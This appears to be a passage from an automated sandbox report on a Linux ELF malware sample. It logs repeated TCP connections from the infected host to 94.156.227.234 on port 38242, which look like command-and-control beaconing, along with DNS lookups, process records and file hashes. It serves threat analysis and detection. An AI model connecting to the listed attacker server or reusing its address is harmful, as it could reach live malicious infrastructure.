Dec 27, 2024 09:24:18.395298958 CET	38284	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:18.731441975 CET	38286	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:18.851149082 CET	38242	38286	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:18.851331949 CET	38286	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:18.851366043 CET	38286	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:18.971267939 CET	38242	38286	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:19.356762886 CET	38286	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:19.522706032 CET	38242	38286	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:19.982423067 CET	38242	38286	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:19.982597113 CET	38286	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:20.357913971 CET	38288	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:20.478660107 CET	38242	38288	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:20.478807926 CET	38288	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:20.478807926 CET	38288	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:20.598401070 CET	38242	38288	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:20.982598066 CET	38288	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:21.145503044 CET	38242	38288	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:21.677494049 CET	38242	38288	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:21.677599907 CET	38288	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:21.983746052 CET	38290	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:22.103504896 CET	38242	38290	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:22.103596926 CET	38290	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:22.103598118 CET	38290	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:22.223278046 CET	38242	38290	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:22.607383966 CET	38290	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:22.768728971 CET	38242	38290	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:23.274993896 CET	38242	38290	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:23.275161982 CET	38290	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:23.608757973 CET	38292	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:23.730480909 CET	38242	38292	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:23.730659008 CET	38292	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:23.730830908 CET	38292	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:23.851304054 CET	38242	38292	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:24.235713959 CET	38292	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:24.400717974 CET	38242	38292	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:24.873930931 CET	38242	38292	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:24.874063969 CET	38292	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:25.237082005 CET	38294	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:25.357053041 CET	38242	38294	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:25.357271910 CET	38294	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:25.357271910 CET	38294	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:25.476957083 CET	38242	38294	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:25.862164021 CET	38294	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:26.025352001 CET	38242	38294	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:26.537389994 CET	38242	38294	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:26.537483931 CET	38294	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:26.863507986 CET	38296	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:26.983160019 CET	38242	38296	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:26.983257055 CET	38296	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:26.983316898 CET	38296	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:27.102953911 CET	38242	38296	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:27.487677097 CET	38296	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:27.648947954 CET	38242	38296	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:28.157026052 CET	38242	38296	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:28.157152891 CET	38296	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:28.488821030 CET	38298	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:28.609277964 CET	38242	38298	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:28.609375954 CET	38298	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:28.609375954 CET	38298	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:28.729013920 CET	38242	38298	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:29.113346100 CET	38298	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:29.276784897 CET	38242	38298	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:29.821894884 CET	38242	38298	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:29.822006941 CET	38298	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:30.114700079 CET	38300	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:30.234410048 CET	38242	38300	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:30.234512091 CET	38300	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:30.234565973 CET	38300	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:30.355005026 CET	38242	38300	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:30.739443064 CET	38300	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:30.904716015 CET	38242	38300	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:31.393069983 CET	38242	38300	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:31.393198967 CET	38300	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:31.740679026 CET	38302	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:31.860371113 CET	38242	38302	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:31.860532999 CET	38302	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:31.860593081 CET	38302	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:31.980171919 CET	38242	38302	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:32.364372969 CET	38302	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:32.524739027 CET	38242	38302	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:33.014476061 CET	38242	38302	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:33.014596939 CET	38302	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:33.365612030 CET	38304	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:33.485426903 CET	38242	38304	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:33.485527992 CET	38304	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:33.485574961 CET	38304	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:33.605501890 CET	38242	38304	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:33.990436077 CET	38304	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:34.156763077 CET	38242	38304	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:34.689675093 CET	38242	38304	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:34.689740896 CET	38304	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:34.991687059 CET	38306	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:35.111583948 CET	38242	38306	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:35.111712933 CET	38306	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:35.111749887 CET	38306	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:35.231568098 CET	38242	38306	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:35.616385937 CET	38306	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:35.776869059 CET	38242	38306	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:36.263478994 CET	38242	38306	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:36.263612986 CET	38306	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:36.618103981 CET	38308	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:36.737768888 CET	38242	38308	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:36.737932920 CET	38308	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:36.737992048 CET	38308	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:36.857801914 CET	38242	38308	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:37.243041039 CET	38308	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:37.404757023 CET	38242	38308	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:37.955435038 CET	38242	38308	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:37.955565929 CET	38308	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:38.244443893 CET	38310	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:38.364079952 CET	38242	38310	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:38.364156008 CET	38310	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:38.364198923 CET	38310	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:38.484745026 CET	38242	38310	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:38.868999958 CET	38310	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:39.029531002 CET	38242	38310	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:39.527581930 CET	38242	38310	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:39.527697086 CET	38310	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:39.870435953 CET	38312	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:39.990236044 CET	38242	38312	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:39.990495920 CET	38312	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:39.990495920 CET	38312	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:40.110341072 CET	38242	38312	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:40.494956017 CET	38312	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:40.656719923 CET	38242	38312	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:41.210419893 CET	38242	38312	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:41.210494995 CET	38312	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:41.496448040 CET	38314	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:41.616153955 CET	38242	38314	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:41.616257906 CET	38314	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:41.616283894 CET	38314	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:41.736254930 CET	38242	38314	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:42.121551037 CET	38314	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:42.284863949 CET	38242	38314	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:42.779778004 CET	38242	38314	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:42.779973984 CET	38314	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:43.122925997 CET	38316	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:43.630923986 CET	38242	38316	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:43.631052017 CET	38316	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:43.631170988 CET	38316	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:43.750874043 CET	38242	38316	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:44.136311054 CET	38316	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:44.296714067 CET	38242	38316	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:44.821548939 CET	38242	38316	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:44.821685076 CET	38316	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:45.137881994 CET	38318	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:45.257440090 CET	38242	38318	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:45.257565022 CET	38318	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:45.257616997 CET	38318	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:45.377187014 CET	38242	38318	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:45.761853933 CET	38318	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:45.924942017 CET	38242	38318	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:46.509258032 CET	38242	38318	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:46.509407997 CET	38318	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:46.762983084 CET	38320	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:46.883501053 CET	38242	38320	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:46.883584023 CET	38320	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:46.883625031 CET	38320	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:47.004014969 CET	38242	38320	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:47.387646914 CET	38320	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:47.548861027 CET	38242	38320	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:48.035828114 CET	38242	38320	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:48.035938025 CET	38320	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:48.389055014 CET	38322	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:48.508898973 CET	38242	38322	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:48.509082079 CET	38322	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:48.509145975 CET	38322	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:48.628819942 CET	38242	38322	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:49.015495062 CET	38322	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:49.176863909 CET	38242	38322	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:49.667980909 CET	38242	38322	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:49.668211937 CET	38322	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:50.016509056 CET	38324	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:50.136507988 CET	38242	38324	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:50.136586905 CET	38324	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:50.136639118 CET	38324	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:50.256344080 CET	38242	38324	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:50.641690969 CET	38324	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:50.805546999 CET	38242	38324	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:51.286967039 CET	38242	38324	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:51.287306070 CET	38324	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:51.642810106 CET	38326	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:51.762710094 CET	38242	38326	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:51.762800932 CET	38326	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:51.762800932 CET	38326	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:51.882513046 CET	38242	38326	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:52.267241955 CET	38326	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:52.429255009 CET	38242	38326	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:52.974057913 CET	38242	38326	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:52.974180937 CET	38326	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:53.268953085 CET	38328	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:53.388845921 CET	38242	38328	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:53.388987064 CET	38328	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:53.389035940 CET	38328	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:53.508821964 CET	38242	38328	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:53.895566940 CET	38328	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:54.056812048 CET	38242	38328	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:54.552954912 CET	38242	38328	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:54.553102016 CET	38328	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:54.896950006 CET	38330	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:55.016729116 CET	38242	38330	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:55.016865969 CET	38330	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:55.016918898 CET	38330	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:55.136915922 CET	38242	38330	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:55.522398949 CET	38330	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:55.684793949 CET	38242	38330	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:56.138487101 CET	38242	38330	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:56.138835907 CET	38330	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:56.523582935 CET	38332	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:56.643543005 CET	38242	38332	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:56.643660069 CET	38332	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:56.643702984 CET	38332	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:56.763449907 CET	38242	38332	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:57.149382114 CET	38332	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:57.312808990 CET	38242	38332	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:57.794511080 CET	38242	38332	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:57.794661999 CET	38332	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:58.151210070 CET	38334	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:58.271480083 CET	38242	38334	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:58.271761894 CET	38334	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:58.271878004 CET	38334	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:58.391561985 CET	38242	38334	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:58.779293060 CET	38334	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:58.941669941 CET	38242	38334	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:59.449239016 CET	38242	38334	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:59.449371099 CET	38334	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:59.781019926 CET	38336	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:59.900866032 CET	38242	38336	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:59.901017904 CET	38336	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:59.901190042 CET	38336	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:25:00.021001101 CET	38242	38336	94.156.227.234	192.168.2.15
Dec 27, 2024 09:25:00.408104897 CET	38336	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:25:00.568897009 CET	38242	38336	94.156.227.234	192.168.2.15
Dec 27, 2024 09:25:01.061438084 CET	38242	38336	94.156.227.234	192.168.2.15
Dec 27, 2024 09:25:01.061517000 CET	38336	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:25:01.409662008 CET	38338	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:25:01.744884968 CET	38242	38338	94.156.227.234	192.168.2.15
Dec 27, 2024 09:25:01.745071888 CET	38338	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:25:01.745178938 CET	38338	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:25:01.864769936 CET	38242	38338	94.156.227.234	192.168.2.15
Dec 27, 2024 09:25:02.251075983 CET	38338	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:25:02.412929058 CET	38242	38338	94.156.227.234	192.168.2.15
Dec 27, 2024 09:25:02.924422026 CET	38242	38338	94.156.227.234	192.168.2.15
Dec 27, 2024 09:25:02.924506903 CET	38338	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:25:03.252882004 CET	38340	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:25:03.372682095 CET	38242	38340	94.156.227.234	192.168.2.15
Dec 27, 2024 09:25:03.373043060 CET	38340	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:25:03.373043060 CET	38340	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:25:03.492865086 CET	38242	38340	94.156.227.234	192.168.2.15
Dec 27, 2024 09:25:03.879411936 CET	38340	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:25:04.040887117 CET	38242	38340	94.156.227.234	192.168.2.15
Dec 27, 2024 09:25:04.574737072 CET	38242	38340	94.156.227.234	192.168.2.15
Dec 27, 2024 09:25:04.574871063 CET	38340	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:25:04.880747080 CET	38342	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:25:05.000627995 CET	38242	38342	94.156.227.234	192.168.2.15
Dec 27, 2024 09:25:05.000772953 CET	38342	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:25:05.000772953 CET	38342	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:25:05.120712042 CET	38242	38342	94.156.227.234	192.168.2.15
Dec 27, 2024 09:25:05.509087086 CET	38342	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:25:05.673028946 CET	38242	38342	94.156.227.234	192.168.2.15
Dec 27, 2024 09:25:06.139915943 CET	38242	38342	94.156.227.234	192.168.2.15
Dec 27, 2024 09:25:06.140322924 CET	38342	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:25:06.511578083 CET	38344	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:25:06.631352901 CET	38242	38344	94.156.227.234	192.168.2.15
Dec 27, 2024 09:25:06.631572008 CET	38344	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:25:06.631608963 CET	38344	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:25:06.751323938 CET	38242	38344	94.156.227.234	192.168.2.15
Dec 27, 2024 09:25:07.137917995 CET	38344	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:25:07.301008940 CET	38242	38344	94.156.227.234	192.168.2.15
Dec 27, 2024 09:25:07.827136040 CET	38242	38344	94.156.227.234	192.168.2.15
Dec 27, 2024 09:25:07.827246904 CET	38344	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:25:08.139791965 CET	38346	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:25:08.260071039 CET	38242	38346	94.156.227.234	192.168.2.15
Dec 27, 2024 09:25:08.260230064 CET	38346	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:25:08.260329008 CET	38346	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:25:08.379915953 CET	38242	38346	94.156.227.234	192.168.2.15
Dec 27, 2024 09:25:08.765820980 CET	38346	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:25:08.928843021 CET	38242	38346	94.156.227.234	192.168.2.15
Dec 27, 2024 09:25:09.417649984 CET	38242	38346	94.156.227.234	192.168.2.15
Dec 27, 2024 09:25:09.417738914 CET	38346	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:25:09.767247915 CET	38348	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:25:09.887015104 CET	38242	38348	94.156.227.234	192.168.2.15
Dec 27, 2024 09:25:09.887149096 CET	38348	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:25:09.887207985 CET	38348	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:25:10.006905079 CET	38242	38348	94.156.227.234	192.168.2.15
Dec 27, 2024 09:25:10.392708063 CET	38348	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:25:10.552795887 CET	38242	38348	94.156.227.234	192.168.2.15
Dec 27, 2024 09:25:11.058401108 CET	38242	38348	94.156.227.234	192.168.2.15
Dec 27, 2024 09:25:11.058510065 CET	38348	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:25:11.393783092 CET	38350	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:25:11.513586044 CET	38242	38350	94.156.227.234	192.168.2.15
Dec 27, 2024 09:25:11.513729095 CET	38350	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:25:11.513730049 CET	38350	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:25:11.633550882 CET	38242	38350	94.156.227.234	192.168.2.15
Dec 27, 2024 09:25:12.017930031 CET	38350	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:25:12.180871964 CET	38242	38350	94.156.227.234	192.168.2.15
Dec 27, 2024 09:25:12.640687943 CET	38242	38350	94.156.227.234	192.168.2.15
Dec 27, 2024 09:25:12.640850067 CET	38350	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:25:13.018990040 CET	38352	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:25:13.138725996 CET	38242	38352	94.156.227.234	192.168.2.15
Dec 27, 2024 09:25:13.138921976 CET	38352	38242	192.168.2.15	94.156.227.234

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 27, 2024 09:23:10.451167107 CET	51437	53	192.168.2.15	8.8.8.8
Dec 27, 2024 09:23:10.451224089 CET	54961	53	192.168.2.15	8.8.8.8
Dec 27, 2024 09:23:10.573528051 CET	53	54961	8.8.8.8	192.168.2.15
Dec 27, 2024 09:23:10.585371971 CET	53	51437	8.8.8.8	192.168.2.15

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 27, 2024 09:23:10.451167107 CET	192.168.2.15	8.8.8.8	0x9a36	Standard query (0)	daisy.ubuntu.com	A (IP address)	IN (0x0001)	false
Dec 27, 2024 09:23:10.451224089 CET	192.168.2.15	8.8.8.8	0xc07b	Standard query (0)	daisy.ubuntu.com	28	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 27, 2024 09:23:10.585371971 CET	8.8.8.8	192.168.2.15	0x9a36	No error (0)	daisy.ubuntu.com		162.213.35.24	A (IP address)	IN (0x0001)	false
Dec 27, 2024 09:23:10.585371971 CET	8.8.8.8	192.168.2.15	0x9a36	No error (0)	daisy.ubuntu.com		162.213.35.25	A (IP address)	IN (0x0001)	false

System Behavior

Analysis Process: dash PID: 5509, Parent PID: 3670

General

Start time (UTC):	08:23:03
Start date (UTC):	27/12/2024
Path:	/usr/bin/dash
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:23:03
Start date (UTC):	27/12/2024
Path:	/usr/bin/rm
Arguments:	rm -f /tmp/tmp.39ZHOVXeyH /tmp/tmp.10MVApFg4v /tmp/tmp.xfkh797qb6
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Start time (UTC):	08:23:03
Start date (UTC):	27/12/2024
Path:	/usr/bin/dash
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:23:03
Start date (UTC):	27/12/2024
Path:	/usr/bin/rm
Arguments:	rm -f /tmp/tmp.39ZHOVXeyH /tmp/tmp.10MVApFg4v /tmp/tmp.xfkh797qb6
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Start time (UTC):	08:23:07
Start date (UTC):	27/12/2024
Path:	/tmp/x86_64.nn.elf
Arguments:	/tmp/x86_64.nn.elf
File size:	80064 bytes
MD5 hash:	279351defe09a28e3c35194c0e594f37

Start time (UTC):	08:23:07
Start date (UTC):	27/12/2024
Path:	/tmp/x86_64.nn.elf
Arguments:	-
File size:	80064 bytes
MD5 hash:	279351defe09a28e3c35194c0e594f37

Start time (UTC):	08:23:07
Start date (UTC):	27/12/2024
Path:	/bin/sh
